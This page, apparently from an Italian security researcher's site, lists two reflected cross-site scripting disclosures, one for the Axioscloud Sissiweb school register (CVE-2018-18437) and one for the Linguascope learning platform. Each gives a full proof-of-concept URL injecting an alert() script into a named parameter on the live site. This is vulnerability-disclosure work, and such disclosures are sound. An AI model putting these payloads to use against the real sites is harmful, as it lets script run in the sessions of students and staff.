Canale Youtube Sorgenti Lavori Progetti Guide e POC Informazioni Contattami  




Axioscloud Sissiweb Registro Elettronico - 'Error_desc' Reflective Cross Site Script

# Date: 2018-10-11
# Vendor Homepage: http://axiositalia.it/
# Software Link: http://axiositalia.it/?page_id=1907
# Version: 1.7.0/7.0.0
# Category: Webapps
# Platform: ASPX
# CVE-2018-18437
# POC:
# https://family.axioscloud.it/secret/relogoff.aspx?Error_Desc=Sessione%20non%20Validaa%3Cbody%20onload=%22alert(%27ok%27);%22%3E&Error_Parameters=


Linguascope Language Learning Platform - 'Activity' Reflective Cross Site Script

# Date: 2018-11-24
# Vendor Homepage: https://www.linguascope.com
# Category: Webapps
# Platform: PHP
# POC:
# https://www.linguascope.com/secure/students/elementary/html5/bin/main.php?language=english&activity=%22/%3E%3Cscript%3Ealert(%27Hacked%27)%3C/script%3E%3C%22


 
 


Siti partner

Scuola Calcio Romaria
Asilo Nido Arcobalena

Sostieni il nostro lavoro con un clic! Grazie ;)